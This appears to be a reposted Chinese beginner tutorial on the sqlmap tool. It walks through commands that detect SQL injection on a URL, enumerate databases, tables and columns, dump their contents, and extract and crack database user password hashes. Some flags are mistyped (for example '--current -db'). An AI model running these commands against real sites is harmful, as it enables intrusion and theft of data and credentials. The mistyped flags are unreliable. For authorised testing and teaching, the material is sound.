一、SQLMAP入門
1、判斷是否存在注入
sqlmap.py -u 網址/id=1
id=1不可缺少,當注入點后面的引數大于兩個時,需要加雙引號,
sqlmap.py -u "網址/id=1&uid=1"
2、判斷文本中的請求是否存在注入
從文本中加載http請求,SQLMAP可以從一個文本檔案中獲取http請求,這樣可以不設定其它引數,txt檔案中的內容為web資料包,判斷是否存在注入的命令:
sqlmap.py -r desktop/1.txt
3、查詢當前用戶下的所有資料庫
該命令是確定網站存在注入后,用于查詢當前用戶下的所有資料庫,如果當前用戶有權限讀取包含所有資料庫串列資訊的表,使用該命令就可以列出所有資料庫,
sqlmap.py -u 網址 --dbs、
當繼續注入時,--dbs縮寫成-D xxx,其意思是在xxx資料庫中繼續查詢其他資料,
4、獲取資料庫的表名
該命令的作用是查詢完資料庫后,查詢指定資料庫中所有的表名,如果在該命令中不加入-D引數來指定某一個具體的資料庫,那么SQLMap會列出資料庫中所有庫的表,
sqlmap.py -u "網址“ -D 資料庫名 --tables
當繼續注入時,--tables縮寫成-T,意思時=是在某表中繼續查詢,
5、獲取表中的欄位名
該命令的作用是查詢完表名后,查詢該表中所有的欄位名,
sqlmap.py -u 網址 -D 資料庫名 -T 表名 --columns
在后續注入中,--colums縮寫成 -C ,
6、獲取欄位內容
該命令是查詢完欄位名之后,獲取該欄位中具體的資料資訊,
sqlmap.py -u 網址 -D 資料庫名 -T表名 -C欄位名 --dump
7、獲取資料庫的所有用戶
該命令的作用是列出資料庫的所有用戶,如果當前用戶有權限讀取包含所有用戶的表的權限是,使用該命令就可以列出所有管理用戶,
sqlmap.py -u 網址 --users
8、獲取資料庫用戶的密碼
該命令的作用是列出資料庫用戶的密碼,如果當前用戶有讀取包含用戶密碼的權限,SQLMAP會先例舉出用戶,然后列出Hash,并嘗試破解,
sqlmap.py -u 網址 --passwords
9、獲取當前網站資料的名稱
使用該命令可以列出當前網站使用的資料庫
sqlmap.py -u 網址 --current -db
10、獲取當前網站資料庫的用戶名稱
使用該命令可以列出當前網站使用的資料庫用戶,
sqlmap.py -u 網址 --current -user
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/437.html
標籤:其他